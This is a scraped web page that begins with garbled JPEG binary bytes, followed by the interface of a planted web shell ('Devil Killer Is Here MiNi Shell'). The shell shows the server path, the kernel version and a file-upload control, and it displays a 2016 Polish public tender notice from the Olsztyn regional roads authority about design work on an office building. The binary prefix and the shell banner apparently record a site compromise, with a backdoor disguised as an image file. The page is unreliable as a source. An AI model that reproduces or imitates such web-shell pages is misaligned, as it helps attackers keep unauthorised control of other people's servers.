JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160630/113129-N-2016.html

<p class="kh_header"><b>Olsztyn: Rozbudowa wraz z kompleksową modernizacją energetyczną budynku administracyjno-biurowego zlokalizowanego przy ul. Pstrowskiego 28 b w Olsztynie - Etap I: Opracowanie dokumentacji technicznej</b><br>
<b>Numer ogłoszenia: 113129 - 2016; data zamieszczenia: 30.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Pstrowskiego 28b, 10-602 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5346265 w. 22, faks 089 5399876.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa wraz z kompleksową modernizacją energetyczną budynku administracyjno-biurowego zlokalizowanego przy ul. Pstrowskiego 28 b w Olsztynie - Etap I: Opracowanie dokumentacji technicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Rozbudowa wraz z kompleksową modernizacją energetyczną budynku administracyjno-biurowego zlokalizowanego przy ul. Pstrowskiego 28 b w Olsztynie - Etap I: Opracowanie dokumentacji technicznej.
Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej wraz z pełnieniem nadzoru autorskiego.
2. Przedmiotem niniejszego opisu przedmiotu zamówienia są wymagania dotyczące wykonania i odbioru kompletnej, wielobranżowej dokumentacji projektowej dla projektu budowlanego i wykonawczego (z uzyskaniem decyzji o pozwoleniu na budowę), wraz z pełnieniem nadzoru autorskiego dla zadania inwestycyjnego pn.: Rozbudowa wraz z kompleksową modernizacją energetyczną budynku administracyjno-biurowego zlokalizowanego przy ul. Pstrowskiego 28 b w Olsztynie - Etap I: Opracowanie dokumentacji technicznej.
3. Przedmiotowe zamówienie planowane jest do dofinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2014-2020, Oś Priorytetowa nr 4 - Efektywność energetyczna, Działanie 4.3 - Kompleksowa modernizacja energetyczna budynków, Poddziałanie 4.3.1 - Efektywność energetyczna w budynkach publicznych, oraz ze środków Województwa Warmińsko-Mazurskiego. 
4. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SIWZ, zamieszczonej na stronie internetowej Zamawiającego.
5. Prawo opcji
W ramach realizacji przedmiotu zamówienia Zamawiający przewiduje możliwość zastosowania prawa opcji, których szczegółowy zakres zawiera Szczegółowy opis przedmiotu zamówienia, stanowiący zał. nr 1 do SIWZ oraz Tabela elementów projektowych objętych prawem opcji, stanowiąca zał. nr 6.1 do SIWZ.
Zamawiający zastrzega, że będzie mógł skorzystać z prawa opcji, w zależności od decyzji Zamawiającego, w przypadku gdy będzie wymagał tego cel osiągnięcia zakładanych w audycie energetycznym efektów modernizacji energetycznej oraz gdy usługi wynikające z prawa opcji będą leżały w zakresie możliwości finansowych Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwości udzielania zamówień uzupełniających, o których mowa  w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do wysokości 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.31.40.00-2, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wykonawca jest zobowiązany do wniesienia wadium w  wysokości 7 000,00 PLN (słownie: siedem tysiące złotych 00/100);
2. Wadium musi być wniesione najpóźniej w dniu otwarcia ofert przed upływem terminu składania ofert w jednej lub kilku następujących formach określonych w art. 45 ust. 6 ustawy Pzp:
a) w pieniądzu, przelewem na nr konta: 
w Banku CITI Handlowy:  74 1030 1218 0000 0000 9251 8051 z dopiskiem: wadium na Wykonanie dokumentacji projektowej dla zadania: Rozbudowa wraz z kompleksową modernizacją energetyczną budynku administracyjno-biurowego zlokalizowanego przy ul. Pstrowskiego 28 b w Olsztynie - Etap I: Opracowanie dokumentacji technicznej- znak sprawy: ZDW/NZP.EA-2/PN/3220/92/16 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia  9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Z treści przelewu lub poręczenia albo gwarancji musi jednoznacznie wynikać, do jakiego zadania (nr części, nazwa i numer referencyjny) wadium jest wnoszone.
3. Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone przed upływem terminu składania ofert w sekretariacie Zarządu Dróg Wojewódzkich w Olsztynie.
4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 2.a) rachunek bankowy Zamawiającego przed upływem terminu składania ofert. 
W przypadku wniesienia wadium w  formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp. Uwierzytelnioną kopię dokumentu stanowiącego gwarancję lub poręczenie należy dołączyć do oferty, a oryginał należy zdeponować w sekretariacie, w siedzibie Zamawiającego.
5. Zgodnie z art. 46 ust. 4a i 5 ustawy Pzp Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku, gdy:
1) Wykonawca, którego oferta zostanie wybrana:
a) odmówi podpisania umowy w  sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w  sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
2) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp,  z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej o której mowa w art. 24 ust 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.    
6. Wadium wnoszone w formie gwarancji ubezpieczeniowej lub bankowej należy wystawić na Województwo Warmińsko - Mazurskie - Zarząd Dróg Wojewódzkich w  Olsztynie, ul. Pstrowskiego 28b, 10-602 Olsztyn.
7.  Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (Poręczyciela). Gwarancja (Poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis powinien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
8. Wadium wniesione w formie niepieniężnej musi mieć taką samą płynność jak wadium wniesione w pieniądzu, co oznacza, że dochodzenie roszczeń Zamawiającego nie może być utrudnione. Wadium wniesione w formie niepieniężnej uważane będzie za wniesione, jeżeli z treści dokumentu wynikać będzie, że interesy Zamawiającego w zakresie roszczenia o wypłatę wadium są zabezpieczone w okolicznościach wymienionych w art. 46 ust. 4a i ust. 5 ustawy Pzp, a Gwarant (Poręczyciel) bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, wypłaci Zamawiającemu pełną kwotę wadium po zaistnieniu tychże okoliczności. Gwarancje i poręczenia nie mogą wprowadzać żadnych dodatkowych warunków merytorycznych.
9. Wykonawca, który nie wniesie wadium w wysokości określonej w pkt. 1., lub dopuszczalnej formie (pkt. 2.) zostanie wykluczony z  postępowania, a jego oferta zostanie uznana za odrzuconą.
10. Zamawiający zwróci wadium:
1) wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
2) wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy;
3) niezwłocznie, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 10 ppkt 1), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
12. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi   z  umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełniania warunku 
dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania wiedzy i doświadczenia Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże i udokumentuje, że w okresie ostatnich trzech lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał:
1)  min. jedną główną usługę, której przedmiotem było wykonanie dokumentacji projektowej 
w zakresie budowy/ przebudowy/ rozbudowy lub nadbudowy budynku użyteczności publicznej o kubaturze nie mniejszej niż 10.000 m3.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że powyższy warunek spełnia co najmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.
(Pojęcie budynku użyteczności publicznej zostało zdefiniowane w rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2015 r., poz. 1422).
oraz
2) min. dwie główne usługi, której przedmiotem było wykonanie audytu energetycznego budynku użyteczności publicznej o kubaturze nie mniejszej niż 10.000 m3.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że powyższy warunek spełnia co najmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełniania warunku udziału w postępowaniu, dotyczącego dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełniania warunku udziału w postępowaniu, dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełniania warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Skrócenie terminu wykonania zamówienia w zakresie Etapu IB - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania w umowie następujących zmian:
1) Skrócenia albo wydłużenia terminu wykonania przedmiotu umowy z przyczyn mających obiektywny wpływ na wykonanie przedmiotu umowy, w następujących przypadkach:
a) siły wyższej, to znaczy niezależnego od Stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności;
b) wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy lub jego poszczególnych elementów;
c) przekroczenia przewidywanych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w Kodeksie postępowania administracyjnego;
d) przedłużających się procedur związanych z uzyskiwaniem od organów administracji publicznej lub innych uprawnionych podmiotów pozwoleń, decyzji, uzgodnień 
i innych dokumentów niezbędnych do realizacji przedmiotu umowy;
e) szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych/archiwalnych do poszczególnych elementów umowy;
f) zmiany przepisów prawa mających wpływ na przedmiot umowy;
g) złożenie odwołania od decyzji o udzielenie pozwolenia na budowę;
h) odkrycia zabytku lub wprowadzenia istotnej zmiany formy jego ochrony;
i) udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego, którego realizacja będzie miała wpływ na termin realizacji zamówienia podstawowego;
j) gdy zmiana, o której mowa w § 9 niniejszej umowy będzie skutkowała koniecznością zmiany terminu wykonania przedmiotu umowy;
k) opóźnienia realizacji udzielenia zamówienia publicznego na roboty budowlane realizowane na podstawie dokumentacji projektowej stanowiącej przedmiot niniejszej umowy,
l)  zawarcia umowy na roboty budowlane z innym okresem ich wykonania oraz/lub terminem ich zakończenia niż określony w § 3 pkt 5,
m) zmiany terminów wykonania przedmiotu umowy w zawartej umowie na roboty budowlane realizowane na podstawie przedmiotowej dokumentacji przetargowej;
n) opóźnienia wykonania przedmiotu umowy na roboty budowlane realizowane na podstawie przedmiotowej dokumentacji projektowej; wydłużenie terminu wykonania przedmiotu niniejszej umowy nie będzie dłuższe niż czas zakończenia opóźnionych robót budowlanych;
2) zmianę wysokości wynagrodzenia należnego Wykonawcy w przypadku:
a) zastosowania prawa opcji 
b) okoliczności określonych w § 9 w związku z § 10 umowy,
c) zmiany ustawowej stawki podatku od towarów i usług, z zastrzeżeniem § 4 ust. 6,
d) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. z 2015 r., poz. 2008),
e) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
W przypadkach, o których mowa w lit. c) - d), Strona, która żąda zmiany, wystąpi 
z wnioskiem o wprowadzenie odpowiednich zmian w zakresie wysokości wynagrodzenia należnego Wykonawcy, załączając do wniosku szczegółową kalkulację wpływu tych zmian na dotychczasową wysokość ceny, określonej w Formularzu cenowym oraz szczegółowe wyliczenie proponowanej nowej wysokości tej ceny wraz 
z dokumentami poświadczającymi dokonane kalkulacje i wyliczenia. Druga ze Stron może wnieść uwagi do przedstawionego wyliczenia w terminie 7 dni roboczych od ich przedstawienia. W przypadkach, o których mowa w lit. c) - d) Zamawiający może żądać od Wykonawcy przedstawienia dodatkowych wyliczeń i dokumentów, jeżeli przedstawione przez Wykonawcę dokumenty uzna za niewystarczające. W przypadku uznania przez drugą ze Stron wyliczenia kosztów wykonania zamówienia przez Wykonawcę za zasadne, Strony dokonują zmiany umowy w zakresie wysokości wynagrodzenia należnego Wykonawcy.
3) zmianę lub rezygnację z podwykonawcy/-ów wskazanego/-ych w § 8 ust. 3 umowy, 
z zastrzeżeniem, że w przypadku gdy Wykonawca, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp, powołał się, na zasadach określonych w art. 26 ust. 2b Pzp, na zasoby podmiotu trzeciego zobowiązany jest do wykazania Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie niższym niż wymagany w trakcie postępowania o udzielenie zamówienia.
(Ust. 1 pkt 3. będzie miał zastosowanie w przypadku gdy Wykonawca, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp, powołał się w ofercie, na zasadach określonych w art. 26 ust. 2b Pzp, na zasoby tych  podwykonawców.) 
2. W przypadku gdy nie ma zastosowania § 8 ust. 2 i/lub § 8 ust. 3 zmiana Podwykonawcy lub dalszego podwykonawcy, któremu/-ym powierzono wykonanie części przedmiotu zamówienia, nie stanowi zmiany umowy, ale jest wymagana zgoda Zamawiającego na zmianę Podwykonawcy lub dalszego podwykonawcy, wyrażona poprzez akceptację Umowy 
o podwykonawstwo.
3. Ewentualne zmiany umowy, o których mowa w ust. 1 zostaną dokonane w formie pisemnej 
w postaci aneksu do umowy.
4. O zmianach teleadresowych i tym podobnych Wykonawca powiadomi pisemnie Zamawiającego. Takie zmiany nie wymagają sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Olsztynie, ul. Pstrowskiego 28b, 10-602 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2016 godzina 12:00, miejsce: Zarząd Dróg Wojewódzkich w Olsztynie, 
ul. Pstrowskiego 28b, 10-602 Olsztyn, pokój nr 18 (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dane Zamawiającego występujące w sekcji I zostały wygenerowane automatycznie ze względu na konto Zarządu dróg Wojewódzkich w Olsztynie w biuletynie zamówień Publicznych Zamawiającym jest Województwo Warmińsko - Mazurskie, ul Emilii Plater 1,  10-562 Olsztyn. W imieniu Zamawiającego w niniejszym postępowaniu, na podstawie udzielonego pełnomocnictwa, działa Pełnomocnik. wszelkie zapisy Specyfikacji Istotnych Warunków Zamówienia wskazujące na czynność Zamawiającego będą realizowane przez Pełnomocnika. PEŁNOMOCNIK: Zarząd Dróg Wojewódzkich   Adres: ul. Pstrowskiego 28b, 10-602 OlsztynTelefon: 089-526-19-00, fax. 089 526-19-65e-mail: przetargi@zdw.olsztyn.pl, strona internetowa: www.zdw.olsztyn.pl.
